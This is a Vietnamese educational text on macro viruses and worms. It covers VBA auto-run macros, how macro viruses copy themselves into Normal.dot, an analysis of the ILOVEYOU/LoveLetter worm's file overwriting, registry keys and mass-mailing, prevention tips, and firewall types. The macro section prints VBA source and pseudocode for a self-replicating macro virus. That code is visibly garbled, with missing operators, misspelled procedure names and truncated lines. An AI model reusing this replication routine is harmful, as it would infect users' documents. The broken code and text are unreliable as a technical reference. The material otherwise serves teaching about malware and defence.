Hiện nay, nhiều loại sâu máy tính đã tận dụng macro để tự động thực thi mã khi có tác động từ người dùng vào file văn bản Một ví dụ điển hình là virus worm macro Melissa, đã sử dụng kỹ thuật macro một cách tinh vi để lây nhiễm qua email.
Macro trong MS Office là chương trình được lập trình bằng các ngôn ngữ như WordBasic và VBA (Visual Basic for Applications) nhằm tự động hóa các thao tác trong các ứng dụng của Microsoft Office như Word, Excel và PowerPoint.
Các macro VBA được thiết kế dưới dạng thủ tục hoặc hàm, cho phép chương trình viết bằng ngôn ngữ VBA truy cập vào các tài liệu, bảng tính, Microsoft Outlook, hoặc các đối tượng ứng dụng khác để thực hiện việc đọc và ghi dữ liệu.
Nếu các macro được thiết kế có khả năng tự sao chép từ vị trí này sang vị trí khác, chúng sẽ trở thành virus máy tính do có khả năng lây nhiễm, một đặc điểm quan trọng của virus.
Ngoài các macro do người sử dụng tự thiết kế, trong các ứng dụng của Microsoft Office có một số macro được tự động thi hành như :
AutoExec : Được thi hành mỗi khi chương trình ứng dụng được khởi động
AutoNew : Được thi hành để tạo một tài liệu/văn bản mới
AutoOpen : Được thi hành để mở một tài liệu đã có
AutoClose : Được thi hành để đóng một tài liệu đang mở
Các virus macro có nhiều kỹ thuật lây nhiễm đa dạng, chủ yếu dựa vào khả năng sao chép các macro giữa các file văn bản do ứng dụng hỗ trợ Mỗi đối tượng VBComponent đi kèm với một đối tượng con là CodeModule, cho phép người dùng thao tác với các module chương trình trong file văn bản Virus có thể tận dụng các thuộc tính và phương thức có sẵn để can thiệp trực tiếp vào các module này.
1 Thông qua thành phần VBProject của các đối tượng Microsoft Office Các macro được lưu trữ ngay trong file đối tượng (Document, WorkSheet, E-Mail) hoặc trong các tệp định dạng (Template) và được tham chiếu qua đối tượng Document hoặc WorkSheet Mỗi đối tượng Document đều có thành phần VBProject Trong VBProject có Container Object, là một VBComponents, chứa các thành phần VBA của file văn bản
2 Sử dụng các dịch vụ Import và Export Trong đối tượng VBComponents có một phương thức là Import, cho phép nhập thêm các thành phần VBA (Form/Module/Class) từ một file Mỗi thành phần VBA VBComponent cũng có một phương thức là Export cho phép xuất chính nó ra thành một file (.FRM, BAS, CLA) Mỗi khi muốn sao chép các chương trình virus sang một file văn bản mới, trước hết sử dụng lệnh Export để xuất chương trình ra một file, sau đó sử dụng lệnh Import để nhập chương trình virus vào file văn bản mới
3 Sử dụng OrganizerCopy Phương thức OrganizerCopy của đối tượng Application có thể được sử dụng để sao chép chương trình virus sang một file văn bản khác Giả sử trong file NormalTemplate đã có virus macro TEST01 (tên module virus – macro là TEST01 trong VBA)
For Each obj In ActiveDocument.VBProject.VBComponents
If obj.Name = "TEST01" Then DaNhiem = True
Thủ tục copy virus từ một file tài liệu đã bị nhiễm virus vào file NormalTemplate như sau :
For Each obj In NormalTemplate.VBProject.VBComponents
If obj.Name = "TEST01" Then DaNhiem = True
Macro Virus là loại virus lây lan qua các tệp tài liệu, trong đó tệp tài liệu đóng vai trò là môi trường lây nhiễm chính.
Tệp NORMAL.DOT thường được sử dụng làm công cụ truyền virus do hầu hết các tài liệu đều dựa vào định dạng chung từ tệp này.
Nguyên lý hoạt động ở đây cũng rất đơn giản Giả sử một tệp X đang được kích hoạt đã nhiễm virus Có hai khả năng xảy ra :
Tệp X là tệp NORMAL.DOT, Winword khi làm việc với một tệp khác, sẽ để đối tượng lây lan sang tài liệu đang được sử dụng (Active Document)
X là một tệp Document, đối tượng lây nhiễm sẽ là NORMAL.DOT
1 Trường hợp 1 : X là tệp Normal.Dot, khi này macro đầu tiên được kích hoạt sẽ phải là Macro Open, do phải mở Document (New or Old) công việc phải làm là thi hành đoạn chương trình kèm với Auto Macro Open Lưu ý rằng đoạn chương trình virus gắn vào trong Normal.dot là kèm với macro Open
2 Trường hợp 2 : X là tệp Active Document, lúc này macro được kích hoạt nên là Macro Close, vì Document đã được mở trước đó Công việc phải làm là thi hành đoạn chương trình kèm với Auto Macro Close
5 AD := ActiveDocument.VBProject.VBComponents.Item(1)
6 NT := NormalTemplate.VBProject.VBComponents.Item(1)
7 If AD isn‟t Infected Then F := AD, F1 := NT
8 If NT isn‟t Infected Then F :=NT, F1 :
9 If NT is Infected and AD is Infected Then a) Delete all lines in F.CodeModule b) Put the virus‟s sign into F c) F‟s Infection := TRUE a) You are in F1 now ! b) Delete all First Empty Lines in F1‟s CodeModule c) Insert String "Private Sub Document_Close()" into 1st Line in F d) Copy from 2nd to CountOfLine from F1 to F
If now you are in AD then Insert String "Hi, How are you ? "
Phương án 1, lây vào Normal.dot và Active Document với macro CLOSE Private Sub Document_Close()
CommandBars ("Tools").Controls("Macro").Enabled = True „False
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1) dt=2
If AD.Name "Daisy" Then
If DoIn = False Then Go To Destroy
If Sd >0 Then F.CodeModule.DeleteLines 1, Sd
If DoIn = False Then Go To Destroy
If Sd > 0 Then F.CodeModule.DeleteLines 1, Sd
F.CodeModule.AddFromString ("Private Sub Ducoment_Close()")
Do While F1.CodeModule.Lines(dt,1) ""
F.CodeModule.InsertLines dt, F1.CodeModule.Lines(dt, 1) dt = dt + 1
Selection.TypeText "Hi, I am here ! "
Phương án 2, lây vào Normal.dot với macro OPEN và Active Document với macro CLOSE
CommandBars ("Tools").Controls ("Macro").Enabled = True „False
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1) dt=2
If AD.Name "Daisy" Then
If NT.Name "Daisy" Then
If DoInN = False And DoInD = False Then Go To Destroy
If Sd > 0 Then F.CodeModule.DeleteLines 1, Sd
If DoInD = True Or DoInN = True Then
F.CodeModule.AddFromString("Private Sub Document_Close()")
F.CodeModule.AddFromString ("Pivate Sub Document_Open()")
Do While F1.CodeModule.Lines(dt,1) ""
F.CodeModule.InsertLines dt, F1.CodeModule.Lines(dt,1) dt = dt + 1
Selection.TypeText Date & "Hi, I am here ! "
Phân tích cách thức hoạt động của một số sâu
VBA.LoveLetter và các dạng khác của loại virus này
Loại virus này có khoảng 82 biến thể Dạng cuối cùng đó là VBS.Loveletter.CN
Vào sáng ngày 4 tháng 5 năm 2000, Trung tâm an ninh mạng Symantec, nổi tiếng toàn cầu, bắt đầu nhận được yêu cầu từ người dùng liên quan đến một loại worm mới xuất phát từ Manila, Philippines Loại worm này có khả năng lây lan rộng rãi, lây nhiễm hàng triệu máy tính trên toàn thế giới.
Loại sâu này tự động gửi email qua Microsoft Outlook và lây lan qua phòng chat MIRC Nó ghi đè lên các file từ xa, bao gồm nhiều định dạng như vbs, js, jpg, doc, mp3, và nhiều loại khác, gây ra thiệt hại nghiêm trọng cho hệ thống.
Worm sử dụng mã nguồn để thay đổi hầu hết các file bằng cách thêm đuôi mở rộng vbs, ví dụ như file image.jpg sẽ trở thành image.jpg.vbs Tuy nhiên, các file có phần mở rộng mp2 và mp3 sẽ không bị ảnh hưởng hoặc phá hủy.
Mặt khác VBS.Loveletter cũng download một chú ngựa Trojan từ một website
Cách thức hoạt động của loại sâu này : (threat assessment)
Số lượng site nhiễm : 3 – 9 Phân bố địa lý : cao
Mức độ thiệt hại (đe dọa) : bình thường Khả năng gỡ bỏ : bình thường
Payload trigger : tấn công qua thư điện tử
Payload : ghi đè lên file
Phạm vi thư điện tử : Tự nó gửi đến tất cả các địa chỉ có trong hộp địa chỉ Outlook
Files with the following extensions can be overwritten: vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, html, xls, ini, bat, com, mp3, and, and mp.
Chúng có thể bị phát hiện bởi những phần mềm antivirus
Degrades performance : Làm giảm thiểu khả năng của email server
Chủ đề của email (subject of mail) : ILOVEYOU
Tên của phần đính kèm (name of attachment) : Love – letter – for- you.txt.vbs
Kích thước đính kèm : 10,307 bytes
Hướng chia sẻ (shared drives) : Viết đè lên file đã được xác định trên mạng
The infection type involves files with various extensions, including vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, htm, html, xls, ini, bat, com, mp3, and mp2.
Khi hoạt động, worm tự nó sao chép tới thư mục \Windows\System cả mskernel32.vbs và LOVE-LETTER-FOR-YOU.TXT.vbs và tới thư mục
\Windows file Win32dll.vbs nó kiểm tra sự có mặt của Winfat32.exe trong thư mục \Windows\System
Nếu file này không tồn tại, worm sẽ đặt trình IE khởi động trang web với win-bugsfix.exe.Site này sẽ bị bắt
Nếu file này tồn tại, worm sẽ tạo khóa sau :
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-
Và thi hành trong suốt quá trình khởi động hệ thống Khi trình duyệt khởi động thì nó sẽ thay thế bằng một trang rỗng
Virus và worm thường lây nhiễm vào các ổ đĩa, bao gồm cả ổ đĩa mạng, thông qua các file có phần mở rộng vbs và vbe Ngoài ra, worm cũng tìm kiếm các file khác như js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, html, xls, ini, bat, com, mp3, and, và mp2 Khi phát hiện các loại file này, worm sẽ tiến hành lây nhiễm.
Phần mềm độc hại ghi đè lên tất cả các tệp có phần mở rộng (.js, jse, ) bằng mã chứa virus, đồng thời tạo ra một bản sao của tệp và thêm phần mở rộng vbs vào tên tệp Chẳng hạn, nếu tệp gốc có tên là House_pics.jpg, tệp đã bị ghi đè sẽ có tên là House_pics.jpg.vbs Sau khi ghi đè, tệp gốc sẽ bị xóa, và những tệp này cần phải được xóa trước khi khôi phục từ bản sao lưu.
Tạo bản sao cho tất cả các file có phần mở rộng mp3 và mp2, sau đó ghi đè chúng bằng mã nhiễm virus và thêm phần mở rộng vbs vào tên file Tiếp theo, thay đổi thuộc tính của file gốc mp3 và mp2 để chúng không bị thay đổi trên ổ cứng Cuối cùng, các file đã bị thay đổi sẽ bị xóa.
Khuyến cáo: Tránh thực thi các file đã bị ghi đè hoặc đổi tên bởi worm, vì điều này có thể kích hoạt lại hoạt động của worm.
Worm lây lan qua một phương thức khác bằng cách tạo ra file Script.ini trong thư mục chương trình MIRC File script này có chức năng gửi file LOVE-LETTER-FOR-YOU.HTM đến các người dùng khác trong cùng một phòng chat.
Worm sử dụng các hàm MAPI để kết nối với chương trình Microsoft Outlook và tạo ra các thông điệp từ tất cả địa chỉ trong hộp thư của Outlook Worm lưu trữ một phần số địa chỉ đã gửi thông điệp trong Windows registry, đảm bảo rằng mỗi địa chỉ chỉ nhận một lần thông điệp.
Chủ đề của thông điệp là :
Thân của thông điệp là : kindly check the attached LOVELETTER coming from me
File đính kèm vào thông điệp là LOVE-LETTER-FOR-YOU.TXT.vbs Cuối cùng virus gửi một file LOVE-LETTER-FOR-YOU.HTM đến thư mục \Windows\System
Bảng tóm tắt các đầu vào registry đã bị thay đổi :
Các khóa registry có thể bị thêm vào :
HKEY_LOCAL_MACHINE\Software\Microsoft\
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunServices\Win32DLL
HKEY_LOCAL_MACHINE\Software\Microsoft\
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunServices\ES32DLL
HKEY_LOCAL_MACHINE\Software\Microsoft\
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run\WIN-BUGFIX
Một hoặc một số chương trình bị thêm khóa như :
HKEY_USERS\\Software\Microsoft\
Các khóa registry sau có thể bị xóa :
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\Network\HideSharePwds
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\Network\DisablePwdCaching
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\Network\HideSharePwds
Thêm vào đó hàng trăm các giá trị registry DWORD có tiềm năng được tạo ra trong HKEY_USERS\\SOFTWARE\Microsoft\WAB
Trên cơ sở có bao nhiêu thông điệp thư điện tử được gửi ra ngoài Những khóa này sẽ được phân biệt cho mỗi máy
Các phiên bản khác của LOVELETTER
Trung tâm an ninh mạng đã phát hiện ra tới 82 phiên bản của virus loveletter
VBS.LoveLetter.A và VBS.LoveLetter.B là hai loại virus máy tính có đặc điểm riêng biệt VBS.LoveLetter.A, mang chủ đề "ILOVEYOU", thường gửi thông điệp yêu cầu người nhận kiểm tra tệp đính kèm "LOVELETTER", với tên tệp là LOVE-LETTER-FOR-YOU.TXT.vbs Trong khi đó, VBS.LoveLetter.B, chủ yếu xuất hiện ở Lithuania, có chủ đề thông điệp "Susitikim shi vakara kavos puodukui…" và tệp đính kèm mang tên "giống loài 1" Cả hai virus đều lợi dụng sự tò mò của người dùng để lây lan.
Nhiều loại malware hiện nay có điểm chung, hoạt động như một sâu thực thụ và sử dụng kỹ thuật virus để đính kèm file, từ đó lây lan và gây hại cho hệ thống.
Mặc dù như vậy sâu loveletter vẫn cần sự tác động của con người là phải mở thư và tệp đính kèm để kích hoạt sự lây lan
Các biện pháp để ngăn chặn virus LoveLetter
1 Bạn không nên mở e-mail có cái tựa đề (subject) quá đã là
Virus "ILOVEYOU" có thể được gửi từ bất kỳ ai, bao gồm cả bạn bè hoặc người yêu Sau khi xâm nhập vào máy tính của nạn nhân, virus này sẽ lấy địa chỉ email trong danh bạ và gửi chính nó đến bạn Nếu bạn nhận được email với tiêu đề này, hãy ngay lập tức xóa nó khỏi hệ thống và nhớ xóa cả trong thư mục lưu trữ các thư đã xóa (trong Outlook Express là thư mục Deleted Items).
2 Nếu đã nhận e-mail "ILOVEYOU" rồi, bạn hãy delete nó ngay và liên lạc với người gửi để báo tin cho người ấy biết máy người ấy đã bị con bọ Love làm hại rồi
CÁCH PHÒNG CHỐNG
Để ngăn chặn sự lây lan và tấn công của sâu máy tính cũng như virus máy tính, có nhiều phương pháp hiệu quả Một số biện pháp phòng ngừa bao gồm sử dụng tường lửa (firewall), áp dụng các thủ thuật bảo mật, và cài đặt phần mềm diệt virus Ngoài ra, cần có những ý tưởng sáng tạo để phát hiện và loại bỏ sâu, virus khỏi hệ thống một cách kịp thời.
3.1.Bức tường lửa(Firewall) Ứng dụng bức tường lửa là cách mà người ta thường dùng để bảo vệ cho hệ thông tin của mình khỏi những xâm nhập bất hợp pháp từ phía ngoài mạng cũng như phía trong mạng Hiểu đơn giản thì nó giống như trạm kiểm soát sẵn cho nó
Hệ thống firewall là một tập hợp các thành phần phần cứng và phần mềm, tạo thành rào chắn bảo vệ mạng khỏi các mạng không tin cậy Nó giữ lại và phân tích các gói dữ liệu đi vào và ra khỏi mạng, quyết định cho phép hoặc từ chối dựa trên chính sách bảo vệ đã được thiết lập Firewall đóng vai trò quan trọng trong việc bảo vệ mạng riêng khi kết nối với các mạng khác.
Bằng việc kiểm soát tất cả các gói tin đi qua, firewall có thể thực hiện các chức năng cơ bản sau :
Kiểm soát quyền truy nhập :
Firewall chỉ cho phép người dùng hợp lệ truy cập tài nguyên mạng, xác định quyền truy cập của từng người dùng và cách thức truy nhập Để thực hiện điều này, firewall cần hiểu các dịch vụ và ứng dụng hoạt động trên mạng Hiện nay, chỉ những firewall có thành phần kiểm tra toàn bộ trạng thái mới có khả năng này Các thế hệ firewall lọc gói tin đầu tiên không nhận biết ứng dụng, do đó không thể kiểm soát quyền truy cập Trong khi đó, firewall Proxy ứng dụng không cung cấp hỗ trợ kịp thời cho các dịch vụ mới.
Để cải thiện quản lý truy cập, tường lửa có khả năng theo dõi, hiển thị, lập báo cáo và cảnh báo về lưu lượng mạng mà nó kiểm soát Tính năng này cho phép quản trị viên hệ thống xem xét tất cả các kết nối đang hoạt động theo thời gian thực và có khả năng ngắt hoặc chặn các kết nối không mong muốn.
Ghi lại nhật ký làm việc :
Firewall có khả năng phân tích thông tin truy cập và kết nối một cách chi tiết, bao gồm người dùng, loại dịch vụ, thời gian bắt đầu, đích đến và quá trình kết nối Ngoài ra, firewall cũng ghi nhận các hành động thực hiện trong quá trình kết nối và lập báo cáo phân tích chi tiết về các sự kiện này.
Các firewall cung cấp nhiều tùy chọn cảnh báo, bao gồm việc gửi thông báo qua email và sử dụng giao thức SNMP để truyền tải các cảnh báo an ninh đến các hệ thống quản trị mạng.
Ngăn chặn các kiểu tấn công thông thường
Một số firewall có thể chống được các kiểu tấn công như : Ipspoofing (giả mạo địa chỉ IP)…
3.1.2.1 Firewall lọc gói tin (Packet Filtering Firewall)
Firewall lọc gói tin kiểm tra từng gói tin IP để xác định xem nó có phù hợp với các quy tắc đã được thiết lập hay không, từ đó quyết định có cho phép gói tin đi qua hay không Các quy tắc này xác định lưu lượng hợp lệ dựa trên thông tin trong tiêu đề lớp mạng, lớp giao vận và hướng di chuyển của gói tin được ghi trong tiêu đề.
Các bộ lọc gói thường cho phép thao tác (chấp nhận hoặc từ chối) việc truyền dữ liệu dựa trên các điều khiển sau :
Giao tiếp vật lý mà gói tin đến từ đó Địa chỉ IP nguồn của gói tin Địa chỉ IP đích của gói tin
Kiểu giao thức tầng vận chuyển (TCP, UDP, ICMP)
Cổng nguồn của tầng vận chuyển
Cổng đích của tầng vận chuyển
Kỹ thuật lọc gói không phân tích các giao thức tầng ứng dụng trong gói tin, mà chỉ áp dụng các quy tắc đối với thông tin TCP/IP Do không kiểm tra dữ liệu tầng ứng dụng và không theo dõi trạng thái kết nối, loại firewall này được coi là kém an toàn nhất trong các công nghệ firewall hiện có.
Công nghệ firewall này cho phép truy cập dễ dàng qua firewall với số lượng kiểm tra tối thiểu, giúp tăng tốc độ xử lý Nhờ vào việc xử lý ít hơn so với các kỹ thuật firewall khác, đây là giải pháp firewall nhanh nhất hiện có, thường được triển khai trong các thiết bị phần cứng như bộ định tuyến IP.
Firewall lọc gói thường thực hiện việc thay đổi địa chỉ nguồn của các gói tin, khiến cho thông tin đi ra từ mạng nội bộ có địa chỉ khác Quá trình này được gọi là chuyển dịch địa chỉ mạng (Network Address Translation - NAT), giúp che giấu các địa chỉ bên trong mạng và bảo vệ thông tin của máy trạm nội bộ.
3.1.2.2 Firewall mức kết nối (Circuit Level Firewall)
Firewall mức kết nối xác nhận tính hợp lệ của gói tin bằng cách kiểm tra các kết nối giữa hai tầng giao vận tương đương Để phê chuẩn một phiên làm việc, firewall này đảm bảo rằng kết nối tạo ra một thủ tục bắt tay hợp lệ cho giao thức tầng giao vận, thường là TCP, và chỉ cho phép gửi gói tin dữ liệu sau khi thủ tục này hoàn tất Nó duy trì một bảng thông tin về các kết nối hợp lệ, bao gồm trạng thái phiên làm việc và thứ tự gói tin, cho phép gói tin dữ liệu đi qua nếu thông tin phù hợp với bảng kết nối ảo Khi một kết nối kết thúc, thông tin trong bảng kết nối ảo sẽ bị xóa và kết nối ảo giữa hai tầng giao vận cũng sẽ được đóng.
Khi một kết nối được thiết lập, firewall mức kết nối thường lưu giữ các thông tin về kết nối sau :
Nhận dạng phiên làm việc duy nhất đối với kết nối này, nó được sử dụng cho các mục đích theo dõi, giám sát
Trạng thái của kết nối : Đang bắt tay, đã thiết lập hay kết thúc Thông tin thứ tự các gói tin Địa chỉ IP nguồn Địa chỉ IP đích
Giao tiếp vật lý mà gói tin đến từ đó
Giao tiếp vật lý mà gói tin sẽ qua đó để đi ra
Tường lửa mức kết nối kiểm tra thông tin trong tiêu đề mỗi gói tin để xác định quyền gửi và nhận dữ liệu giữa máy tính truyền và máy tính nhận.
Firewall mức kết nối cho phép truy cập với mức kiểm tra tối thiểu bằng cách tạo ra các trạng thái kết nối nhất định Chỉ các gói tin thuộc về kết nối đã có trong bảng mới được phép đi qua Khi nhận gói tin thiết lập kết nối, firewall kiểm tra các quy tắc để xác định tính hợp lệ của kết nối Nếu được phép, tất cả gói tin liên quan sẽ được định tuyến qua firewall mà không cần kiểm tra an ninh bổ sung.
Firewall mức kết nối có khả năng thực hiện kiểm tra bổ sung để xác nhận tính xác thực của gói tin và dữ liệu trong tiêu đề giao thức tầng giao vận Điều này giúp phát hiện các kiểu dữ liệu gói tin bị sửa đổi.